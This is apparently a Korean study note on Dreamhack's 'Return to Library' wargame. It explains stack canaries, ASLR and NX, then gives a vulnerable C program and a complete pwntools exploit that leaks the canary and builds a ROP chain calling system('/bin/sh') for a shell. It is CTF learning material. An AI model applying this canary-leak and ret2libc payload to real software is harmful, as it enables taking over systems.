[dreamhack] Return to Library

• Return Address Overwrite: 반환 주소를 악성 함수의 주소로 덮어서 셸 획득
• Stack Canary: 스택 프레임의 반환 주소 전에 랜덤한 카나리를 주입하여 반환 주소를 덮기 어렵게 함
• Return to Shellcode: 카나리를 우회하고, 셸 코드를 주입한 버퍼의 주소로 반환 주소를 덮어서 셸 획득
• ASLR: 임의 버퍼의 주소를 알기 어렵게 함
• NX: 각 세그먼트에 불필요한 실행권한을 제거함으로써 공격자가 임의 버퍼에 주입한 코드를 실행하기 어렵게함

 

Return to Library -> NX를 우회하는 공격기법  

NX로 인해 코드 영역 외에는 실행권한이 없어지기 때문에 실행권한이 남아있는 코드 영역으로 반환 주소를 덮는 공격 기법을 고안했다.

 

프로세스에 실행 권한이 있는 메모리 영역은 일반적으로 바이너리의 코드 영역과 바이너리가 참조하는 라이브러리의 코드 영역이다.

 

공격자들은 libc의 함수들(다양한 함수 구현된 라이브러리)로 NX를 우회하고 셸을 획득하는 공격 기법을 개발하였고, 이를 Return To Libc라고 하였다. 

 

// Name: rtl.c
// Compile: gcc -o rtl rtl.c -fno-PIE -no-pie
#include <stdio.h>
#include <unistd.h>

// ASLR 이 적용돼도 PIE가 적용되지 않으면 코드 세그먼트와 데이터 세그먼트의 주소는 고정
// 즉 "/bin/sh"의 주소는 고정 
const char* binsh = "/bin/sh";

int main() {
  char buf[0x30];
  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);
  
  // Add system function to plt's entry
  system("echo 'system@plt'");
  
  // Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);
  
  // Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  return 0;
}

 

1) "bin/sh" 를 코드 섹션에 추가 (주소는 고정임 NO PIE 이므로)

2) system 함수를 PLT에 추가 

- ASLR이 걸려있어도 PIE가 적용되어 있지 않다면 PLT의 주소는 고정

- 무작위로 매핑되는 라이브러리의 베이스 주소는 몰라도 이 방법으로 라이브러리 함수를 실행할 수 있음 

 

 

익스플로잇 시나리오 

1. 카나리 우회 -> 적절한 길이로 buf를 입력받으면 카나리까지 함께 출력 가능할 듯?? ( 첫번째 입력 )

2. rdi값을 “/bin/sh”의 주소로 설정 및 셸 획득

- NX로 인해 buf에 셸코드 주입하고 이를 실행하는 것은 불가 즉, 다른방법으로 셸을 획득해야함!

- 우리가 알 고 있는 것 : "/bin/sh"의 주소, system 함수의 PLT 주소 

- system("/bin/sh")을 호출 하면 셸을 획득할 수 있다.  (rdi = "/bin/sh")

 

리턴 가젯?

- ret로 끝나는 어셈블리 코드 조각 

- 리턴 가젯을 사용하여 반환 주소와 이후의 버퍼를 다음과 같이 덮으면, pop rdi로 rdi를 “/bin/sh”의 주소로 설정하고, 이어지는 ret로 system 함수를 호출할 수 있다. 

 

리턴 가젯을 찾는 방법은 다양하지만, 일반적으로 ROPgadget 사용!

python3 -m pip install ROPgadget --user

$ ROPgadget --binary ./rtl --re "pop rdi"
Gadgets information
============================================================
0x0000000000400853 : pop rdi ; ret

위와 같이 --re 옵션을 이용해 찾고 싶은 가젯을 필터링한다. 

왼편에 16진수로 적힌 주소가 가젯의 주소이다. 

 

이제 익스플로잇을 해보자!

 

1. 카나리 우회 

이와 같이 buf부터 rbp까지의 거리는 0x40이다. 

즉 buf부터 canary까지의 거리는 0x40-0x08 = 0x38이다. 

 

즉 우리는 0x38 + 1 = 0x39 byte 만큼 아무문자로 채워주면 카나리 값까지 함께 알아낼 수 있다. 

# leak canary 
buf = b"A"*0x39
p.sendafter("Buf: ",buf)
p.recvuntil(buf)
cnry = u64(b"\x00"+p.recv(7))
print("canary: ", hex(cnry))

공격 코드로 바꿔보면 이러하다. 

 

2.  리턴 가젯 

addr of ("pop rdi; ret")   <= return address
addr of string "/bin/sh"   <= ret + 0x8
addr of "system" plt       <= ret + 0x10

다음과 같이 가젯을 구성하고 실행하면 system(“/bin/sh”) 을 실행할 수 있다!

 

"/bin/sh"의 주소는 pwndbg에서

search /bin/sh

을 입력해 찾을 수 있다. 

또한 원하는 PLT 주소는 pwntools의 ELF를 이용해 찾을 수 있다. 

 

pop rdi 가젯 주소! 

 

from pwn import * 

p = process("./rtl")
e = ELF("./rtl")
context.arch = "amd64"

# 1) leak canary 
buf = b"A"*0x39
p.sendafter("Buf: ",buf)
p.recvuntil(buf)
cnry = u64(b"\x00"+p.recv(7))
print("canary: ", hex(cnry))

# 2) exploit 
system_plt = e.plt["system"]
binsh = 0x402004
ret = 0x000000000040101a # 아무 가젯이나 넣어주면 된다. (일반적으로 ret)
pop_rdi = 0x0000000000401333

payload = b"B"*0x38 # buf2cnry
payload += p64(cnry) # cnry 
payload += b"C"*0x08 # sfp 
payload += p64(ret) # system 함수로 이동할 때 스택은 16바이트 단위로 정렬되어있어야해서 넣어주는 코드 
payload += p64(pop_rdi) 
payload += p64(binsh)
payload += p64(system_plt)

p.sendafter("Buf: ", payload)

p.interactive()

[출처]

드림핵